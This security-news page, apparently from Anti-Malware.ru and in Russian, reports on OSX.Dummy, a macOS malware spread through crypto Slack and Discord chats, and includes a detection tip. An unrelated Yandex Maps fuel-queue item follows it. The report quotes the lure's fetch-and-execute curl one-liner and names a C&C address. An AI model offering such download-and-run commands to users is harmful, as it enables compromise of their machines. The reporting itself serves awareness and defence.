Новый вредонос для macOS атакует криптовалютное сообщество

Новый вредонос для macOS атакует криптовалютное сообщество

Новый вредонос для macOS атакует криптовалютное сообщество

Известный исследователь в области безопасности Патрик Уордл проанализировал новую вредоносную программу для систем macOS, которая атакует криптовалютное сообщество. Вредонос получил имя OSX.Dummy.

«Мне удалось зафиксировать несколько атак на пользователей macOS, они брали свое начало в чатах Slack или Discord, в которых общалось криптовалютное сообщество. В этих чатах люди делятся небольшими сниппетами, чем и воспользовались злоумышленники — вредоносный бинарник загружается и выполняется на компьютерах ничего не подозревающих жертв», — объясняет Ремко Верхов, обнаруживший OSX.Dummy эксперт.

Верхоф уточнил, что люди, маскирующиеся под администраторов групповых чатов, делились небольшими фрагментами кода, который приводил к загрузке и выполнению вредоносной программы. Пример такого фрагмента:

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Уордл отметил, что вредоносный двоичный файл не подписан, это значит, что он будет заблокирован GateKeeper, однако атакующие обошли это ограничение, заставляя жертв загружать и выполнять вредоносный код напрямую с помощью команд терминала.

OSX.Dummy пытается присвоить своему файлу права root, выполнив sudo-команду, однако это потребует от пользователя ввода пароля в терминале. Пароль сохраняется вредоносным кодом в папке /tmp/dumpdummy.

Затем зловред выполняет ряд операций, которые обеспечивают ему укоренение в системе и последующий автоматический запуск.

Вредоносный код также пытается подключиться к C&C-серверу 185[.]243.115.230, используя порт 1337. Если подключение проходит успешно, злоумышленник сможет выполнять команды с root-привилегиями.

«Чтобы првоерить свою систему на предмет заражения этим вредоносом, запустите KnockKnock от root. Ищите неподписанный элемент запуска com.startup.plist, выполняющий нечто с именем «script.sh»», — заключил Уордл.

Карты и Навигатор Яндекса научились искать заправки без очередей

Яндекс обновил сервисы для водителей: теперь Карты и Навигатор показывают, есть ли на конкретной АЗС топливо и насколько велика очередь. Всё это видно прямо в карточке заправки, там же можно сразу построить маршрут.

Данные об очередях появились и в «Яндекс Go» с «Заправками». Функция уже работает в Москве, Санкт-Петербурге и ещё 14 крупных городах, включая Казань, Екатеринбург, Краснодар, Новосибирск, Самару и Челябинск.

Информацию собирают сразу из нескольких источников. Яндекс анализирует обезличенные данные о заказах топлива, сведения от таксистов в «Яндекс Про» и дорожную ситуацию рядом с АЗС. Плюс подключили самих водителей: тем, кто заправился или просто проехал мимо станции, могут предложить короткий опрос.

 

Ещё одно нововведение — экономичные маршруты. Карты и Навигатор теперь могут предложить путь, на котором машина потратит меньше топлива. Он не обязательно будет самым быстрым, зато может оказаться выгоднее за счёт более плавной скорости и меньшего числа светофоров.

Получается, маршрут теперь можно выбирать не только по принципу «где быстрее», но и «где не сжечь полбака и не провести вечер в очереди».

Пока функция доступна только там, где Яндекс получает достаточно регулярных и достоверных данных. В остальных городах её обещают включать по мере накопления информации.

RSS: Новости на портале Anti-Malware.ru